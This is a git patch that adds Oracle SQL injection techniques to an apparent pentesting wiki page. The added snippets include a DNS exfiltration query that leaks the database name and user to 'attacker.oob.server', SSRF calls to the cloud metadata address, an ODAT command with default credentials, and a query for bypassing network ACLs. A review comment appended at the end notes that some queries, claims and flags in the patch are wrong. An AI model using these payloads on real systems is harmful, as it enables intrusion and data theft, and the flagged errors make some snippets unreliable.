From cc71a571fa0a9581db423c36aaa13df7e9415589 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Tue, 5 Aug 2025 16:24:44 +0000 Subject: [PATCH] Add content from: Research Update: Enhanced src/pentesting-web/sql-injection/o... --- .../sql-injection/oracle-injection.md | 94 ++++++++++++++++++- 1 file changed, 92 insertions(+), 2 deletions(-) diff --git a/src/pentesting-web/sql-injection/oracle-injection.md b/src/pentesting-web/sql-injection/oracle-injection.md index a2ab5851700..58a1e493a7c 100644 --- a/src/pentesting-web/sql-injection/oracle-injection.md +++ b/src/pentesting-web/sql-injection/oracle-injection.md 
@@ -156,9 +156,99 @@ select UTL_HTTP.request('http://scanme.nmap.org:25') from dual; A `ORA-12541: TNS:no listener` or a `TNS:operation timed out` is a sign that the TCP port is closed, whereas a `ORA-29263: HTTP protocol error` or data is a sign that the port is open. -Another package I have used in the past with varied success is the [`GETCLOB()` method of the `HTTPURITYPE` Oracle abstract type](https://docs.oracle.com/database/121/ARPLS/t_dburi.htm#ARPLS71705) that allows you to interact with a URL and provides support for the HTTP protocol. The `GETCLOB()` method is used to fetch the GET response from a URL as a [CLOB data type.](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html)[select HTTPURITYPE('http://169.254.169.254/latest/meta-data/instance-id').getclob() from dual; +Another package I have used in the past with varied success is the [`GETCLOB()` method of the `HTTPURITYPE` Oracle abstract type](https://docs.oracle.com/database/121/ARPLS/t_dburi.htm#ARPLS71705) that allows you to interact with a URL and provides support for the HTTP protocol. The `GETCLOB()` method is used to fetch the GET response from a URL as a [CLOB data type.](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html) -{{#include ../../banners/hacktricks-training.md}} +``` +SELECT HTTPURITYPE('http://169.254.169.254/latest/meta-data/instance-id').getclob() FROM dual; +``` + +--- + +## Additional Packages & Techniques (Oracle 19c → 23c) + +### UTL_INADDR – DNS-based exfiltration and host discovery + +`UTL_INADDR` exposes simple name-resolution helpers that trigger an outbound DNS lookup from the database host. Because only a domain is required (no port/ACL needed) it is a reliable primitive for blind-exfil when other network callouts are blocked. 
+ +```sql +-- Leak the DB name and current user via a DNS query handled by Burp Collaborator +SELECT UTL_INADDR.get_host_address( + (SELECT name FROM v$database)||'.'||(SELECT user FROM dual)|| + '.attacker.oob.server') FROM dual; +``` + +`get_host_address()` returns the resolved IP (or raises `ORA-29257` if resolution fails). The attacker only needs to watch for the incoming DNS request on the controlled domain to confirm code execution. + +### DBMS_CLOUD.SEND_REQUEST – full HTTP client on Autonomous/23c + +Recent cloud-centric editions (Autonomous Database, 21c/23c, 23ai) ship with `DBMS_CLOUD`. The `SEND_REQUEST` function acts as a general-purpose HTTP client that supports custom verbs, headers, TLS and large bodies, making it far more powerful than the classical `UTL_HTTP`. + +```sql +-- Assuming the current user has CREATE CREDENTIAL and network ACL privileges +BEGIN + -- empty credential when no auth is required + DBMS_CLOUD.create_credential( + credential_name => 'NOAUTH', + username => 'ignored', + password => 'ignored'); +END; +/ + +DECLARE + resp DBMS_CLOUD_TYPES.resp; +BEGIN + resp := DBMS_CLOUD.send_request( + credential_name => 'NOAUTH', + uri => 'http://169.254.169.254/latest/meta-data/', + method => 'GET', + timeout => 3); + dbms_output.put_line(DBMS_CLOUD.get_response_text(resp)); +END; +/ +``` + +Because `SEND_REQUEST` allows arbitrary target URIs it can be abused via SQLi for: +1. Internal port scanning / SSRF to cloud metadata services. +2. Out-of-band exfiltration over HTTPS (use Burp Collaborator or an `ngrok` tunnel). +3. Callbacks to attacker servers even when older callout packages are disabled by ACLs. + +ℹ️ If you only have a classical on-prem 19c but can create Java stored procedures, you can sometimes install `DBMS_CLOUD` from the OCI client bundle — useful in some engagements. 
+ +### Automating the attack surface with **ODAT** + +[ODAT – Oracle Database Attacking Tool](https://github.com/quentinhardy/odat) has kept pace with modern releases (tested up to 19c, 5.1.1 – Apr-2022). The `–utl_http`, `–utl_tcp`, `–httpuritype` and newer `–dbms_cloud` modules automatically: +* Detect usable callout packages/ACL grants. +* Trigger DNS & HTTP callbacks for blind extraction. +* Generate ready-to-copy SQL payloads for Burp/SQLMap. + +Example: quick OOB check with default creds (takes care of ACL enumeration in the background): + +```bash +odat all -s 10.10.10.5 -p 1521 -d XE -U SCOTT -P tiger --modules oob +``` + +### Recent network ACL restrictions & bypasses + +Oracle tightened default Network ACLs in the July 2023 CPU — unprivileged accounts now receive `ORA-24247: network access denied by access control list` by default. Two patterns still allow callouts through SQLi: +1. Target account owns an ACL entry (`DBMS_NETWORK_ACL_ADMIN.create_acl`) that was added by a developer for integrations. +2. The attacker abuses a high-privilege PL/SQL definer-rights routine (e.g. in a custom application) that *already* has `AUTHID DEFINER` and the necessary grants. +If you encounter `ORA-24247` during exploitation always search for reusable procedures: + +```sql +SELECT owner, object_name +FROM dba_objects +WHERE object_type = 'PROCEDURE' + AND authid = 'DEFINER'; +``` +(in many audits at least one reporting/export procedure had the needed rights). +--- + +## References + +* Oracle Docs – `DBMS_CLOUD.SEND_REQUEST` package description and examples. +* quentinhardy/odat – Oracle Database Attacking Tool (latest release 5.1.1, Apr-2022). + +{{#include ../../banners/hacktricks-training.md}}
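Review bot: the definer-rights discovery query under "Recent network ACL restrictions & bypasses" will not run as written, because `dba_objects` has no `authid` column (`WHERE object_type = 'PROCEDURE' AND authid = 'DEFINER'` raises an invalid-identifier error); the `AUTHID` column lives in `dba_procedures`, so the query should read `SELECT owner, object_name FROM dba_procedures WHERE authid = 'DEFINER'`, which also covers functions and packages rather than only standalone procedures, and for an audit it is worth adding `AND owner NOT IN ('SYS','SYSTEM')` to cut the noise. Two smaller points in the same hunk: the `UTL_INADDR` paragraph says "no port/ACL needed", but `UTL_INADDR` lookups are governed by the `resolve` privilege of the same network ACLs that the later section describes as denying callouts with `ORA-24247`, so the sentence contradicts the ACL section and should say that a `resolve` grant is still required; and in the ODAT paragraph the module names are written with en dashes (`–utl_http`, `–httpuritype`, `–dbms_cloud`) instead of `--`, and the `--modules oob` switch and the `dbms_cloud` module are not backed by the cited release notes, so they should be checked against `odat --help` before merge. Finally, the claims that the July 2023 CPU changed default ACL behaviour and that `DBMS_CLOUD` can be installed from the OCI client bundle carry no citation, and the References section lists "Oracle Docs" without a URL; please link the `DBMS_CLOUD.SEND_REQUEST` and `DBMS_NETWORK_ACL_ADMIN` documentation pages that the text relies on.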